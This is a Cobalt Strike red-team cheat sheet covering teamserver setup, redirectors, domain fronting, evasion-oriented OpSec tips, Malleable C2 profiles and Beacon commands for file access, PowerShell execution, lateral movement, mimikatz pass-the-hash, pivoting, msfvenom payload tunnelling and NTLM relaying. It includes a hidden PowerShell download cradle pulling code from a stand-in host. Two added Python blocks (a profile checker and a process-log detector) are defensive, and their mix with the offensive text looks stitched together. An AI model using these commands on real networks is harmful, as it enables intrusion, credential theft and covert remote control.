
Cobalt Strike

Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity.

$ sudo apt-get update
$ sudo apt-get install openjdk-11-jdk
$ sudo apt install proxychains socat
$ sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
$ sudo ./teamserver 10.10.10.10 "password" [malleable C2 profile]
$ ./cobaltstrike
$ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))"


Infrastructure

Redirectors

sudo apt install socat
socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80

Domain Fronting

  • New Listener > HTTP Host Header
  • Choose a domain in "Finance & Healthcare" sector

OpSec

Don't
  • Use the default self-signed HTTPS certificate
  • Use the default port (50050)
  • Use 0.0.0.0 as a DNS response
  • Keep Metasploit compatibility enabled: it lets anyone ask the team server for a payload, e.g. wget -U "Internet Explorer" http://127.0.0.1/vl6D

Do
  • Use a redirector (Apache, CDN, ...)
  • Firewall the team server so it only accepts HTTP/S from the redirectors
  • Firewall port 50050 and access it via an SSH tunnel
  • Edit the default HTTP 404 page and its Content-Type: text/plain
  • No staging: set hosts_stage to false in Malleable C2
  • Use a Malleable profile to tailor your attack to specific actors

Customer ID

The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike.

  • The Customer ID value is the last 4 bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later.
  • The trial has a Customer ID value of 0.
  • Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool.

Malleable C2

List of Malleable profiles hosted on GitHub
  • Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles
  • Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2
  • Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles
  • SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint

Example of syntax

set useragent "SOME AGENT"; # GOOD
set useragent 'SOME AGENT'; # BAD
prepend "This is an example;";

# Escape Double quotes
append "here is \"some\" stuff";
# Escape Backslashes
append "more \\ stuff";
# Some special characters do not need escaping
prepend "!@#$%^&*()";

Check a profile with ./c2lint. Its exit code tells you the outcome:
  • 0 if c2lint completes with no errors
  • 1 if c2lint completes with only warnings
  • 2 if c2lint completes with only errors
  • 3 if c2lint completes with both errors and warnings
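The quoting rules above are easy to get wrong, and defenders also parse profiles to pull indicators such as the user agent out of them. As an added example, not Cobalt Strike's or c2lint's own code, here is a minimal Python checker for exactly the statement forms shown above; it assumes a simplified one-statement-per-line grammar, rejects the single-quoted "BAD" form, and reports a c2lint-style exit code:

```python
import re

# Added example, not Cobalt Strike's own parser: a minimal checker for the statement
# syntax shown above. Assumed simplified grammar, one statement per line:
#   set <name> "<string>";   prepend "<string>";   append "<string>";
# A '#' starts a comment only outside a string; \" and \\ are the only escapes.
_CODE = re.compile(r'''^(?:[^"'#]|"(?:\\.|[^"\\])*"|'[^']*')*''')   # text before any comment
_STMT = re.compile(
    r'^(?P<kw>set|prepend|append)\s+'
    r'(?:(?P<name>[A-Za-z_]\w*)\s+)?'
    r'(?P<str>"(?:\\.|[^"\\])*"|\'[^\']*\')\s*;$'
)

def unescape(body: str) -> str:
    # Resolve \" and \\ ; any other backslash sequence stays literal.
    return re.sub(r'\\(["\\])', r'\1', body)

def parse_profile(text: str):
    """Return (statements, errors); each statement is a (keyword, name, value) tuple."""
    statements, errors = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = _CODE.match(raw).group(0).strip()      # comment-free part of the line
        if not line:
            continue
        m = _STMT.match(line)
        if not m:
            errors.append(f'line {lineno}: cannot parse statement: {line}')
        elif m['str'].startswith("'"):
            errors.append(f'line {lineno}: strings must use double quotes')
        else:
            statements.append((m['kw'], m['name'], unescape(m['str'][1:-1])))
    return statements, errors

def lint_exit_code(errors, warnings=()):
    """Mirror the c2lint convention: 0 clean, 1 warnings only, 2 errors only, 3 both."""
    return (1 if warnings else 0) | (2 if errors else 0)

# Constructed sample input: the syntax lines from this page, "BAD" line included.
SAMPLE = r'''set useragent "SOME AGENT"; # GOOD
set useragent 'SOME AGENT'; # BAD
prepend "This is an example;";
append "here is \"some\" stuff";
append "more \\ stuff";
prepend "!@#$%^&*()";
'''

if __name__ == '__main__':
    stmts, errs = parse_profile(SAMPLE)
    print(stmts, errs, 'exit code', lint_exit_code(errs))
```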

Files

# List the file on the specified directory
beacon > ls <C:\Path>

# Change into the specified working directory
beacon > cd [directory]

# Delete a file\folder
beacon > rm [file\folder]

# File copy
beacon > cp [src] [dest]

# Download a file from the path on the Beacon host
beacon > download [C:\filePath]

# Lists downloads in progress
beacon > downloads

# Cancel a download currently in progress
beacon > cancel [*file*]

# Upload a file from the attacker to the current Beacon host
beacon > upload [/path/to/file]

Powershell and .NET

Powershell commands

# Import a Powershell .ps1 script from the control server and save it in memory in Beacon
beacon > powershell-import [/path/to/script.ps1]

# Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned.
beacon > powershell [commandlet][arguments]

# Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto
beacon > powerpick [commandlet] [argument]

# Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs
beacon > psinject [pid][arch] [commandlet] [arguments]

.NET remote execution

Run a local .NET executable as a Beacon post-exploitation job.

Requires binaries compiled with the "Any CPU" configuration.

beacon > execute-assembly [/path/to/script.exe] [arguments]
beacon > execute-assembly /home/audit/Rubeus.exe
[*] Tasked beacon to run .NET program: Rubeus.exe
[+] host called home, sent: 318507 bytes
[+] received output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2 

Lateral Movement

⚠ OPSEC Advice: Use the spawnto command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe

  • portscan: Performs a portscan on a specific target.
  • runas: A wrapper of runas.exe, using credentials you can run a command as another user.
  • pth: By providing a username and an NTLM hash you can perform a Pass The Hash attack and inject a TGT into the current process.
    ❗ This module needs Administrator privileges.
  • steal_token: Steal a token from a specified process.
  • make_token: By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
  • jump: Provides an easy and quick way to move laterally using winrm or psexec to spawn a new Beacon session on a target.
    ❗ The jump module will use the current delegation/impersonation token to authenticate on the remote target.
    💪 We can combine the jump module with the make_token or pth module for a quick "jump" to another target on the network.
  • remote-exec: Execute a command on a remote target using psexec, winrm or wmi.
    ❗ The remote-exec module will use the current delegation/impersonation token to authenticate on the remote target.
  • ssh/ssh-key: Authenticate using ssh with password or private key. Works for both linux and windows hosts.

⚠ All the commands launch powershell.exe
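From the defender's side, the traces this section names are the useful ones: a powershell.exe started by the service controller or the WinRM host (jump/remote-exec), a rundll32.exe with an empty command line (the default spawnto, which powerpick still relies on even though it avoids powershell.exe), and the download-cradle one-liner from the top of the page. Below is an added detection example, not Cobalt Strike tooling, run over constructed JSON process-creation events; the log format, paths and pids are all assumptions made for the example:

```python
import json
import re

# Added example, not Cobalt Strike tooling: flag the process-level artefacts this page
# describes in process-creation events. The log format and every event below are
# constructed for this example (one JSON object per line: pid, parent_image, image, cmdline).
CRADLE = re.compile(r'downloadstring|\bIEX\b|Invoke-Expression', re.I)
HIDDEN = re.compile(r'-(?:nop|noprofile|w(?:indowstyle)?\s+hidden)\b', re.I)
ARGV0 = re.compile(r'^(?:"[^"]*"|\S+)\s*(.*)$', re.S)

def basename(path: str) -> str:
    return path.rsplit('\\', 1)[-1].lower()

def detect(event: dict) -> list:
    """Return the rule names one event trips (empty list means nothing suspicious)."""
    image, parent = basename(event.get('image', '')), basename(event.get('parent_image', ''))
    m = ARGV0.match(event.get('cmdline', ''))
    args = m.group(1).strip() if m else ''          # command line without argv[0]
    hits = []
    if image == 'powershell.exe':
        if HIDDEN.search(args) and CRADLE.search(args):
            hits.append('powershell download cradle (stager one-liner)')
        if parent in ('services.exe', 'wsmprovhost.exe'):
            hits.append(f'powershell started by {parent} (psexec_psh/winrm style)')
    # rundll32.exe normally gets a DLL and entry point; an empty command line is the
    # classic trace of the default spawnto used for post-exploitation jobs.
    if image == 'rundll32.exe' and not args:
        hits.append('rundll32.exe with no arguments (default spawnto)')
    return hits

def scan(log_text: str) -> dict:
    """Map pid -> rule hits for every event that tripped at least one rule."""
    alerts = {}
    for line in log_text.splitlines():
        if line.strip():
            ev = json.loads(line)
            if hits := detect(ev):
                alerts[ev['pid']] = hits
    return alerts

# Constructed sample log: the page's stager one-liner, a default-spawnto rundll32, a
# service- and a WinRM-launched PowerShell, plus two benign look-alikes.
SAMPLE_LOG = r'''
{"pid": 4120, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))\""}
{"pid": 4188, "parent_image": "C:\\Users\\audit\\Downloads\\update.exe", "image": "C:\\Windows\\System32\\rundll32.exe", "cmdline": "C:\\Windows\\System32\\rundll32.exe"}
{"pid": 4201, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\rundll32.exe", "cmdline": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"}
{"pid": 4300, "parent_image": "C:\\Windows\\System32\\services.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -encodedcommand BASE64_PLACEHOLDER"}
{"pid": 4311, "parent_image": "C:\\Windows\\System32\\wsmprovhost.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -encodedcommand BASE64_PLACEHOLDER"}
{"pid": 4320, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"}
'''
```

Running scan(SAMPLE_LOG) flags pids 4120, 4188, 4300 and 4311 and stays quiet on the two benign events.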

Beacon Remote Exploits
======================
jump [module] [target] [listener] 

    psexec  x86 Use a service to run a Service EXE artifact
    psexec64    x64 Use a service to run a Service EXE artifact
    psexec_psh  x86 Use a service to run a PowerShell one-liner
    winrm   x86 Run a PowerShell script via WinRM
    winrm64 x64 Run a PowerShell script via WinRM

Beacon Remote Execute Methods
=============================
remote-exec [module] [target] [command] 

    Methods                         Description
    -------                         -----------
    psexec                          Remote execute via Service Control Manager
    winrm                           Remote execute via WinRM (PowerShell)
    wmi                             Remote execute via WMI (PowerShell)

Opsec safe Pass-the-Hash:
  1. mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden"
  2. steal_token PID

Assume Control of Artifact

  • Use link to connect to SMB Beacon
  • Use connect to connect to TCP Beacon

VPN & Pivots

⚠ Covert VPN doesn't work with W10, and requires Administrator access to deploy.

Use socks 8080 to set up a SOCKS4a proxy server on port 8080 (or any other port you choose). This starts a SOCKS proxy server that tunnels traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it; use sleep 0 to make Beacon check in several times a second.

# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
beacon > socks [PORT]
beacon > socks [port]
beacon > socks [port] [socks4]
beacon > socks [port] [socks5]
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]

# Proxy browser traffic through a specified Internet Explorer process.
beacon > browserpivot [pid] [x86|x64]

# Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port.
beacon > rportfwd [bind port] [forward host] [forward port]

# spunnel: Spawn an agent and create a reverse port forward tunnel to its controller (roughly rportfwd + shspawn).
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin
beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin

# spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller
# then you can handle the connect back on your MSF multi handler
beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin

Beacon Object Files

A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs.

Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h

  • Compile
    # To compile this with Visual Studio:
    cl.exe /c /GS- hello.c /Fohello.o
    
    # To compile this with x86 MinGW:
    i686-w64-mingw32-gcc -c hello.c -o hello.o
    
    # To compile this with x64 MinGW:
    x86_64-w64-mingw32-gcc -c hello.c -o hello.o
    
  • Execute: inline-execute /path/to/hello.o

NTLM Relaying via Cobalt Strike

beacon> socks 1080
kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://<IP_TARGET>
beacon> rportfwd_local 8445 <IP_KALI> 445
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445
